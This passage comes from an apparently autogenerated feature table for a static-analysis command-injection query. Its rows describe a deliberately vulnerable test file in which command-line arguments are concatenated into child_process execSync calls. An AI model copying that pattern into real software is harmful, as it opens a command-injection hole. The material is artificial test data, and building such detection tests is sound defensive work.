exceptional return of cp.execSync(arg0) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:19:5:19:12 | execSync | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:19:5:19:12 | execSync | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:19:5:19:12 | execSync | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:19:5:19:12 | execSync | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:19:5:19:12 | execSync | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:19:14:19:17 | arg0 | CalleeFlexibleAccessPath | cp.execSync | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:19:14:19:17 | arg0 | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:19:14:19:17 | arg0 | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:19:14:19:17 | arg0 | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:19:14:19:17 | arg0 | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:19:14:19:17 | arg0 | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:19:14:19:17 | arg0 | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:19:14:19:17 | arg0 | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:19:14:19:17 | arg0 | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:20:2:20:3 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:20:2:20:3 | cp | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:20:2:20:3 | cp | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:20:2:20:3 | cp | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:20:2:20:3 | cp | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:20:2:20:12 | cp.execSync | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:20:2:20:12 | cp.execSync | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:20:2:20:12 | cp.execSync | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:20:2:20:12 | cp.execSync | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:20:2:20:12 | cp.execSync | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:20:2:20:30 | cp.exec ... + arg0) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:20:2:20:30 | cp.exec ... + arg0) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:20:2:20:30 | cp.exec ... + arg0) | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:20:2:20:30 | cp.exec ... + arg0) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:20:2:20:30 | cp.exec ... + arg0) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:20:2:20:30 | exceptional return of cp.exec ... + arg0) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:20:2:20:30 | exceptional return of cp.exec ... + arg0) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:20:2:20:30 | exceptional return of cp.exec ... + arg0) | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:20:2:20:30 | exceptional return of cp.exec ... + arg0) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:20:2:20:30 | exceptional return of cp.exec ... + arg0) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:20:5:20:12 | execSync | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:20:5:20:12 | execSync | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:20:5:20:12 | execSync | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:20:5:20:12 | execSync | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:20:5:20:12 | execSync | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:20:14:20:22 | "cmd.sh " | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:20:14:20:22 | "cmd.sh " | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:20:14:20:22 | "cmd.sh " | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:20:14:20:22 | "cmd.sh " | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:20:14:20:22 | "cmd.sh " | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:20:14:20:22 | "cmd.sh " | stringConcatenatedWith | -endpoint- arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:20:14:20:29 | "cmd.sh " + arg0 | CalleeFlexibleAccessPath | cp.execSync | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:20:14:20:29 | "cmd.sh " + arg0 | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:20:14:20:29 | "cmd.sh " + arg0 | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:20:14:20:29 | "cmd.sh " + arg0 | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:20:14:20:29 | "cmd.sh " + arg0 | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:20:14:20:29 | "cmd.sh " + arg0 | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:20:14:20:29 | "cmd.sh " + arg0 | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:20:14:20:29 | "cmd.sh " + arg0 | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:20:14:20:29 | "cmd.sh " + arg0 | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:20:26:20:29 | arg0 | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:20:26:20:29 | arg0 | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:20:26:20:29 | arg0 | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:20:26:20:29 | arg0 | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:20:26:20:29 | arg0 | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:20:26:20:29 | arg0 | stringConcatenatedWith | 'cmd.sh ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:23:1:28:2 | (functi ... T OK\\n}) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:23:1:28:2 | (functi ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:23:1:28:2 | (functi ... T OK\\n}) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:23:2:23:1 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:23:2:23:1 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:23:2:23:1 | cp | enclosingFunctionBody | args process argv slice 2 script path join packageDir app index.js cp execSync node script args 0 0 --option" cp execSync node script args join --option" | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:23:2:23:1 | cp | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:23:2:23:1 | cp | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:23:2:23:1 | this | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:23:2:23:1 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:23:2:23:1 | this | enclosingFunctionBody | args process argv slice 2 script path join packageDir app index.js cp execSync node script args 0 0 --option" cp execSync node script args join --option" | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:23:2:23:1 | this | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:23:2:23:1 | this | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:23:2:28:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:23:2:28:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:23:2:28:1 | 'arguments' object of anonymous function | enclosingFunctionBody | args process argv slice 2 script path join packageDir app index.js cp execSync node script args 0 0 --option" cp execSync node script args join --option" | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:23:2:28:1 | 'arguments' object of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:23:2:28:1 | 'arguments' object of anonymous function | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:23:2:28:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:23:2:28:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:23:2:28:1 | exceptional return of anonymous function | enclosingFunctionBody | args process argv slice 2 script path join packageDir app index.js cp execSync node script args 0 0 --option" cp execSync node script args join --option" | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:23:2:28:1 | exceptional return of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:23:2:28:1 | exceptional return of anonymous function | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:23:2:28:1 | functio ... OT OK\\n} | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:23:2:28:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:23:2:28:1 | functio ... OT OK\\n} | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:23:2:28:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:23:2:28:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:23:2:28:1 | return of anonymous function | enclosingFunctionBody | args process argv slice 2 script path join packageDir app index.js cp execSync node script args 0 0 --option" cp execSync node script args join --option" | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:23:2:28:1 | return of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:23:2:28:1 | return of anonymous function | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:24:8:24:11 | args | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:24:8:24:11 | args | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:24:8:24:11 | args | enclosingFunctionBody | args process argv slice 2 script path join packageDir app index.js cp execSync node script args 0 0 --option" cp execSync node script args join --option" | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:24:8:24:11 | args | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:24:8:24:11 | args | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:24:8:24:35 | args | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:24:8:24:35 | args | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:24:8:24:35 | args | enclosingFunctionBody | args process argv slice 2 script path join packageDir app index.js cp execSync node script args 0 0 --option" cp execSync node script args join --option" | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:24:8:24:35 | args | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:24:8:24:35 | args | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:24:8:24:35 | args = ... lice(2) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:24:8:24:35 | args = ... lice(2) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:24:8:24:35 | args = ... lice(2) | enclosingFunctionBody | args process argv slice 2 script path join packageDir app index.js cp execSync node script args 0 0 --option" cp execSync node script args join --option" | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:24:8:24:35 | args = ... lice(2) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:24:8:24:35 | args = ... lice(2) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:24:15:24:21 | process | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:24:15:24:21 | process | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:24:15:24:21 | process | enclosingFunctionBody | args process argv slice 2 script path join packageDir app index.js cp execSync node script args 0 0 --option" cp execSync node script args join --option" | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:24:15:24:21 | process | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:24:15:24:21 | process | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:24:15:24:26 | process.argv | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:24:15:24:26 | process.argv | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:24:15:24:26 | process.argv | enclosingFunctionBody | args process argv slice 2 script path join packageDir app index.js cp execSync node script args 0 0 --option" cp execSync node script args join --option" | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:24:15:24:26 | process.argv | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:24:15:24:26 | process.argv | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:24:15:24:32 | process.argv.slice | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:24:15:24:32 | process.argv.slice | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:24:15:24:32 | process.argv.slice | enclosingFunctionBody | args process argv slice 2 script path join packageDir app index.js cp execSync node script args 0 0 --option" cp execSync node script args join --option" | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:24:15:24:32 | process.argv.slice | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:24:15:24:32 | process.argv.slice | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:24:15:24:35 | exceptional return of process ... lice(2) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:24:15:24:35 | exceptional return of process ... lice(2) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:24:15:24:35 | exceptional return of process ... lice(2) | enclosingFunctionBody | args process argv slice 2 script path join packageDir app index.js cp execSync node script args 0 0 --option" cp execSync node script args join --option" | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:24:15:24:35 | exceptional return of process ... lice(2) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:24:15:24:35 | exceptional return of process ... lice(2) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:24:15:24:35 | process ... lice(2) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:24:15:24:35 | process ... lice(2) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:24:15:24:35 | process ... lice(2) | enclosingFunctionBody | args process argv slice 2 script path join packageDir app index.js cp execSync node script args 0 0 --option" cp execSync node script args join --option" | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:24:15:24:35 | process ... lice(2) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:24:15:24:35 | process ... lice(2) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:24:23:24:26 | argv | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:24:23:24:26 | argv | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:24:23:24:26 | argv | enclosingFunctionBody | args process argv slice 2 script path join packageDir app index.js cp execSync node script args 0 0 --option" cp execSync node script args join --option" | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:24:23:24:26 | argv | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:24:23:24:26 | argv | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:24:28:24:32 | slice | 